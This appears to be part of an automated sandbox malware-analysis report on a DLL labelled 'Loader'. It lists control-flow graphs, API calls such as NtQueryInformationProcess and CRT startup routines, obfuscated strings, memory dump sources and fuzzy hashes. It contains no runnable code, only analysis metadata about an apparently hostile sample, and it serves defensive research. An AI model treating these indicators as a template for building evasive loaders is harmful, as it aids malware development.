1476->1480 1477->1322 1479->1322 1482 6ce272a6-6ce272b3 1480->1482 1483 6ce27d8d-6ce27d94 1480->1483 1485 6ce27b02-6ce27b43 1482->1485 1486 6ce272b9-6ce272c6 1482->1486 1483->1322 1485->1322 1488 6ce27ea1-6ce27ea8 1486->1488 1489 6ce272cc-6ce272d9 1486->1489 1488->1322 1491 6ce27d99-6ce27da3 1489->1491 1492 6ce272df-6ce272e4 1489->1492 1491->1322 1492->1322
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: $|&|$$|&|$NtQueryInformationProcess$[3.5$`gH$`gH$ntdll.dll$x5Zr$x5Zr
                                                                                                                                                                                                                                                                  • API String ID: 0-1907433695
                                                                                                                                                                                                                                                                  • Opcode ID: 6a3de3096ddca1517a85b395a26e16f33202c3c922e5847cfb87d915748dac9d
                                                                                                                                                                                                                                                                  • Instruction ID: 5f19846400457b34d797e28004269c0791ff6cf612188d09e8dde89fd7d880d1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a3de3096ddca1517a85b395a26e16f33202c3c922e5847cfb87d915748dac9d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E923336A442018FDB08CEBCD5A63CE7BF2AB47318F348519E415DBB94D22E990BCB55
                                                                                                                                                                                                                                                                  Function 6CE4EA5E Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1494 6ce4ea5e-6ce4ea71 call 6ce4f310 1497 6ce4ea77-6ce4ea99 call 6ce4eef8 1494->1497 1498 6ce4ea73-6ce4ea75 1494->1498 1502 6ce4eb06-6ce4eb1f call 6ce4f194 call 6ce4f310 1497->1502 1503 6ce4ea9b-6ce4eade call 6ce4efc3 call 6ce4ee7f call 6ce4f2e3 call 6ce4eaf3 call 6ce4f166 call 6ce4eb00 1497->1503 1499 6ce4eae0-6ce4eaef 1498->1499 1514 6ce4eb30-6ce4eb37 1502->1514 1515 6ce4eb21-6ce4eb27 1502->1515 1503->1499 1518 6ce4eb43-6ce4eb57 dllmain_raw 1514->1518 1519 6ce4eb39-6ce4eb3c 1514->1519 1515->1514 1517 6ce4eb29-6ce4eb2b 1515->1517 1521 6ce4ec09-6ce4ec18 1517->1521 1524 6ce4ec00-6ce4ec07 1518->1524 1525 6ce4eb5d-6ce4eb6e dllmain_crt_dispatch 1518->1525 1519->1518 1522 6ce4eb3e-6ce4eb41 1519->1522 1526 6ce4eb74-6ce4eb86 call 6ce2e500 1522->1526 1524->1521 1525->1524 1525->1526 1533 6ce4ebaf-6ce4ebb1 1526->1533 1534 6ce4eb88-6ce4eb8a 1526->1534 1535 6ce4ebb3-6ce4ebb6 1533->1535 1536 6ce4ebb8-6ce4ebc9 dllmain_crt_dispatch 1533->1536 1534->1533 1537 6ce4eb8c-6ce4ebaa call 6ce2e500 call 6ce4ea5e dllmain_raw 1534->1537 1535->1524 1535->1536 1536->1524 1538 6ce4ebcb-6ce4ebfd dllmain_raw 1536->1538 1537->1533 1538->1524
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __RTC_Initialize.LIBCMT ref: 6CE4EAA5
                                                                                                                                                                                                                                                                  • ___scrt_uninitialize_crt.LIBCMT ref: 6CE4EABF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2442719207-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8ce2455d9d80528d713aa44957473fffb887b12d3e2701af6bb49569540adf43
                                                                                                                                                                                                                                                                  • Instruction ID: 43a2253ff515f423baac78948ffa5fac034dc068c4bda9a771a65c69bf51eea8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ce2455d9d80528d713aa44957473fffb887b12d3e2701af6bb49569540adf43
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD41E072A01A54AEDB20CF99E840BEEBA74EF4176CF308519E81567B80C7349A05CBD0
                                                                                                                                                                                                                                                                  Function 6CE4EB0E Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1544 6ce4eb0e-6ce4eb1f call 6ce4f310 1547 6ce4eb30-6ce4eb37 1544->1547 1548 6ce4eb21-6ce4eb27 1544->1548 1550 6ce4eb43-6ce4eb57 dllmain_raw 1547->1550 1551 6ce4eb39-6ce4eb3c 1547->1551 1548->1547 1549 6ce4eb29-6ce4eb2b 1548->1549 1552 6ce4ec09-6ce4ec18 1549->1552 1554 6ce4ec00-6ce4ec07 1550->1554 1555 6ce4eb5d-6ce4eb6e dllmain_crt_dispatch 1550->1555 1551->1550 1553 6ce4eb3e-6ce4eb41 1551->1553 1556 6ce4eb74-6ce4eb86 call 6ce2e500 1553->1556 1554->1552 1555->1554 1555->1556 1559 6ce4ebaf-6ce4ebb1 1556->1559 1560 6ce4eb88-6ce4eb8a 1556->1560 1561 6ce4ebb3-6ce4ebb6 1559->1561 1562 6ce4ebb8-6ce4ebc9 dllmain_crt_dispatch 1559->1562 1560->1559 1563 6ce4eb8c-6ce4ebaa call 6ce2e500 call 6ce4ea5e dllmain_raw 1560->1563 1561->1554 1561->1562 1562->1554 1564 6ce4ebcb-6ce4ebfd dllmain_raw 1562->1564 1563->1559 1564->1554
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3136044242-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2fd5e25e168075f962f0d09e985b328b5c63c9465f90288e59ff7d7f5970064e
                                                                                                                                                                                                                                                                  • Instruction ID: c13799d40846267dd7b0183cab36a02ee1c14223fee25d57803f805e961f12ca
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fd5e25e168075f962f0d09e985b328b5c63c9465f90288e59ff7d7f5970064e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9821BF71D01E68AACB21CE55EC44ABFBA79EB81B9CF318519F81567B50D3318D418BD0
                                                                                                                                                                                                                                                                  Function 6CE4E957 Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1570 6ce4e957-6ce4e965 call 6ce4f310 call 6ce4eff5 1574 6ce4e96a-6ce4e96d 1570->1574 1575 6ce4ea44 1574->1575 1576 6ce4e973-6ce4e98b call 6ce4eef8 1574->1576 1577 6ce4ea46-6ce4ea55 1575->1577 1580 6ce4ea56-6ce4ea5d call 6ce4f194 1576->1580 1581 6ce4e991-6ce4e9a2 call 6ce4ef55 1576->1581 1586 6ce4e9a4-6ce4e9c6 call 6ce4f2b7 call 6ce4ee73 call 6ce4ee97 call 6ce51a1e 1581->1586 1587 6ce4e9f1-6ce4e9ff call 6ce4ea3a 1581->1587 1586->1587 1606 6ce4e9c8-6ce4e9cf call 6ce4ef2a 1586->1606 1587->1575 1592 6ce4ea01-6ce4ea0b call 6ce4f18e 1587->1592 1598 6ce4ea2c-6ce4ea35 1592->1598 1599 6ce4ea0d-6ce4ea16 call 6ce4f0b5 1592->1599 1598->1577 1599->1598 1605 6ce4ea18-6ce4ea2a 1599->1605 1605->1598 1606->1587 1610 6ce4e9d1-6ce4e9ee call 6ce519d9 1606->1610 1610->1587
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __RTC_Initialize.LIBCMT ref: 6CE4E9A4
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE4EE73: InitializeSListHead.KERNEL32(6CEADC50,6CE4E9AE,6CE5F880,00000010,6CE4E93F,?,?,?,6CE4EB67,?,00000001,?,?,00000001,?,6CE5F8C8), ref: 6CE4EE78
                                                                                                                                                                                                                                                                  • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CE4EA0E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3231365870-0
                                                                                                                                                                                                                                                                  • Opcode ID: 028287878c3f252ac36ecad29fd3996f61009d802e51a37870a45df5a8d054f0
                                                                                                                                                                                                                                                                  • Instruction ID: 82e235dbdaa49722330e9898c1f640d513590f017639cb004df9805443588f6a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 028287878c3f252ac36ecad29fd3996f61009d802e51a37870a45df5a8d054f0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7221DE32649A11AEDB04EBB8B4017ECB771AF0632CF30884DD88067FC2CB365149D6E6

                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                  Function 6CE395F0 Relevance: 14.9, Strings: 11, Instructions: 1156COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1743 6ce395f0-6ce3963e 1744 6ce39645-6ce39650 1743->1744 1745 6ce39656-6ce39663 1744->1745 1746 6ce3a548-6ce3a552 1744->1746 1749 6ce3a557-6ce3a55e 1745->1749 1750 6ce39669-6ce39676 1745->1750 1748 6ce3a59e 1746->1748 1748->1744 1749->1748 1752 6ce3a3d0-6ce3a411 1750->1752 1753 6ce3967c-6ce39689 1750->1753 1752->1748 1755 6ce39b88-6ce39b8f 1753->1755 1756 6ce3968f-6ce3969c 1753->1756 1755->1748 1758 6ce396a2-6ce396af 1756->1758 1759 6ce3a439-6ce3a443 1756->1759 1761 6ce3a272-6ce3a281 1758->1761 1762 6ce396b5-6ce396c2 1758->1762 1759->1748 1761->1748 1764 6ce3a416-6ce3a41d 1762->1764 1765 6ce396c8-6ce396d5 1762->1765 1764->1748 1767 6ce3a563-6ce3a56a 1765->1767 1768 6ce396db-6ce396e8 1765->1768 1767->1748 1770 6ce3a056-6ce3a05d 1768->1770 1771 6ce396ee-6ce396fb 1768->1771 1770->1748 1773 6ce3a1f1-6ce3a207 1771->1773 1774 6ce39701-6ce3970e 1771->1774 1773->1748 1776 6ce39714-6ce39721 1774->1776 1777 6ce39a3c-6ce39a8b 1774->1777 1779 6ce39727-6ce39734 1776->1779 1780 6ce3a448-6ce3a4b6 1776->1780 1777->1748 1782 6ce3973a-6ce39747 1779->1782 1783 6ce3a21e-6ce3a22d 1779->1783 1780->1748 1785 6ce39a90-6ce39a97 1782->1785 1786 6ce3974d-6ce3975a 1782->1786 1783->1748 1785->1748 1788 6ce3a232-6ce3a24d call 6ce3bfc0 1786->1788 1789 6ce39760-6ce3976d 1786->1789 1788->1748 1792 6ce39773-6ce39780 1789->1792 1793 6ce3a519-6ce3a520 1789->1793 1796 6ce39786-6ce39793 1792->1796 1797 6ce3a53c-6ce3a543 1792->1797 1793->1748 1799 6ce3a57b-6ce3a582 1796->1799 1800 6ce39799-6ce397a6 1796->1800 1797->1748 1799->1748 1802 6ce39d33-6ce39d3a 1800->1802 1803 6ce397ac-6ce397b9 1800->1803 1802->1748 1805 6ce39b94-6ce39bfa 1803->1805 1806 6ce397bf-6ce397cc 1803->1806 1805->1748 1808 6ce397d2-6ce397df 1806->1808 1809 6ce3a35d-6ce3a3cb 1806->1809 1811 6ce397e5-6ce397f2 1808->1811 1812 6ce3a56f-6ce3a576 1808->1812 1809->1748 1814 6ce397f8-6ce39805 1811->1814 1815 6ce39a9c-6ce39b0a 1811->1815 1812->1748 1817 6ce39d85-6ce39df3 1814->1817 1818 6ce3980b-6ce39818 1814->1818 1815->1748 1817->1748 1820 6ce3a0a8-6ce3a106 call 6ce31740 1818->1820 1821 6ce3981e-6ce3982b 1818->1821 1820->1748 1825 6ce39831-6ce3983e 1821->1825 1826 6ce3a587-6ce3a597 call 6ce31740 1821->1826 1830 6ce3a286-6ce3a2c7 1825->1830 1831 6ce39844-6ce39851 1825->1831 1826->1748 1830->1748 1833 6ce39857-6ce39864 1831->1833 1834 6ce3a10b-6ce3a179 1831->1834 1836 6ce39e63-6ce39ed1 1833->1836 1837 6ce3986a-6ce39877 1833->1837 1834->1748 1836->1748 1839 6ce3a266-6ce3a26d 1837->1839 1840 6ce3987d-6ce3988a 1837->1840 1839->1748 1842 6ce39890-6ce3989d 1840->1842 1843 6ce39d3f-6ce39d80 1840->1843 1845 6ce398a3-6ce398b0 1842->1845 1846 6ce39ed6-6ce39f25 1842->1846 1843->1748 1848 6ce39a16-6ce39a37 1845->1848 1849 6ce398b6-6ce398c3 1845->1849 1846->1748 1848->1748 1851 6ce398c9-6ce398d6 1849->1851 1852 6ce3a17e-6ce3a1ec 1849->1852 1854 6ce3a422-6ce3a434 1851->1854 1855 6ce398dc-6ce398e9 1851->1855 1852->1748 1854->1748 1857 6ce3a010-6ce3a051 1855->1857 1858 6ce398ef-6ce398fc 1855->1858 1857->1748 1860 6ce39902-6ce3990f 1858->1860 1861 6ce3a351-6ce3a358 1858->1861 1863 6ce39c72-6ce39cc3 1860->1863 1864 6ce39915-6ce39922 1860->1864 1861->1748 1863->1748 1866 6ce3a4bb-6ce3a514 call 6ce31740 1864->1866 1867 6ce39928-6ce39935 1864->1867 1866->1748 1870 6ce3a525-6ce3a537 1867->1870 1871 6ce3993b-6ce39948 1867->1871 1870->1748 1874 6ce39cc8-6ce39d2e 1871->1874 1875 6ce3994e-6ce3995b 1871->1875 1874->1748 1877 6ce39961-6ce3996e 1875->1877 1878 6ce3a2cc-6ce3a332 1875->1878 1880 6ce39974-6ce39981 1877->1880 1881 6ce39f9d-6ce3a00b 1877->1881 1878->1748 1883 6ce39987-6ce39994 1880->1883 1884 6ce3a20c-6ce3a219 1880->1884 1881->1748 1886 6ce3a337-6ce3a350 call 6ce4e890 1883->1886 1887 6ce3999a-6ce399a7 1883->1887 1884->1748 1891 6ce3a062-6ce3a0a3 1887->1891 1892 6ce399ad-6ce399ba 1887->1892 1891->1748 1894 6ce399c0-6ce399cd 1892->1894 1895 6ce39f2a-6ce39f98 1892->1895 1897 6ce399d3-6ce399e0 1894->1897 1898 6ce39bff-6ce39c6d 1894->1898 1895->1748 1900 6ce399e6-6ce399f3 1897->1900 1901 6ce39df8-6ce39e5e 1897->1901 1898->1748 1903 6ce399f9-6ce39a06 1900->1903 1904 6ce39b0f-6ce39b83 1900->1904 1901->1748 1906 6ce3a252-6ce3a261 1903->1906 1907 6ce39a0c-6ce39a11 1903->1907 1904->1748 1906->1748 1907->1748
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 'Yo$'Yo$2Jt$2Jt$Z 's$nVy$xvT$xvT$j$}UF$}UF
                                                                                                                                                                                                                                                                  • API String ID: 0-1983602203
                                                                                                                                                                                                                                                                  • Opcode ID: cae4f05471c395d1cb1801c460a0cd9991d7a7ee359494d81527009ec19e78de
                                                                                                                                                                                                                                                                  • Instruction ID: f5cf27e6b1f453dd4ce552c30792852472973ab3e9903c4f13149ae097c314c5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cae4f05471c395d1cb1801c460a0cd9991d7a7ee359494d81527009ec19e78de
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03822836A856619FCF08CEBCD4D53DE3BF2AB47324F306619D815DB794C62A984ACB40
                                                                                                                                                                                                                                                                  Function 6CE3ABC0 Relevance: 10.2, Strings: 7, Instructions: 1476COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 'Gu{$'Gu{$5Q@$^L4q$^L4q$Tc$Tc
                                                                                                                                                                                                                                                                  • API String ID: 0-3390853983
                                                                                                                                                                                                                                                                  • Opcode ID: c5c73f50a3d88c30700c0d6a0a0bfa649bb9427eba225fa01a5cd068d28d1cdd
                                                                                                                                                                                                                                                                  • Instruction ID: 52e3b026bcad43ff899eb9f1969ddf0bf6e2f990002e3d60c9d9c36e632d8169
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5c73f50a3d88c30700c0d6a0a0bfa649bb9427eba225fa01a5cd068d28d1cdd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8B2F276E406258FCF04CEBCC9953DE7BF2AB4B314F20A519D41ADB794C626A90ACF41
                                                                                                                                                                                                                                                                  Function 6CE37530 Relevance: 8.3, Strings: 5, Instructions: 2076COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: #/$M+n$M+n$a.X($u!uw
                                                                                                                                                                                                                                                                  • API String ID: 0-2600747074
                                                                                                                                                                                                                                                                  • Opcode ID: ecc7e70ad4f9566a81d4180e8b17227798390ef51d89847c7995a87468ad00a4
                                                                                                                                                                                                                                                                  • Instruction ID: 3aba437b347d3dec34b94ea42c68d62e8b620562eeb4cf48f62001c6a46f2add
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ecc7e70ad4f9566a81d4180e8b17227798390ef51d89847c7995a87468ad00a4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28E24636A446508FCF08CEBCD9D53CD77F6AB47324F21A519D829DB794C63AA80ACB44
                                                                                                                                                                                                                                                                  Function 6CE44380 Relevance: 8.0, Strings: 6, Instructions: 513COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: (q/$(q/$1GLs$1GLs$J^$J^
                                                                                                                                                                                                                                                                  • API String ID: 0-2601102989
                                                                                                                                                                                                                                                                  • Opcode ID: 579473730d469b3f2439c8ec6628559b38f1f00048ff66887e82e23797f2fc3e
                                                                                                                                                                                                                                                                  • Instruction ID: c6cb5e4106b234205d6bd00b2ea9ea99a50e74d1ca5373dd42c5d734c9b0c9ea
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 579473730d469b3f2439c8ec6628559b38f1f00048ff66887e82e23797f2fc3e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27F1F236B452018FDB08CEBCE5D53DD77F2AB5B364F30D516D420E7B94D22A8A0A8B58
                                                                                                                                                                                                                                                                  Function 6CE39320 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: }@UF$}@UF
                                                                                                                                                                                                                                                                  • API String ID: 0-3815369809
                                                                                                                                                                                                                                                                  • Opcode ID: 511f645fc5b5a007a2a3d2c16820c3adac51898de93e295e172966bd58e4b73f
                                                                                                                                                                                                                                                                  • Instruction ID: dccfb60f99cfb923c94704fb91e3bf72a4ce443e118497f1f800862077ed5621
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 511f645fc5b5a007a2a3d2c16820c3adac51898de93e295e172966bd58e4b73f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E961F176E041128FDF04CEBCC1943DE77B1AB57318F3462059429DB794CB3AAA46CBA5
                                                                                                                                                                                                                                                                  Function 6CE11020 Relevance: 7.1, Strings: 5, Instructions: 880COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
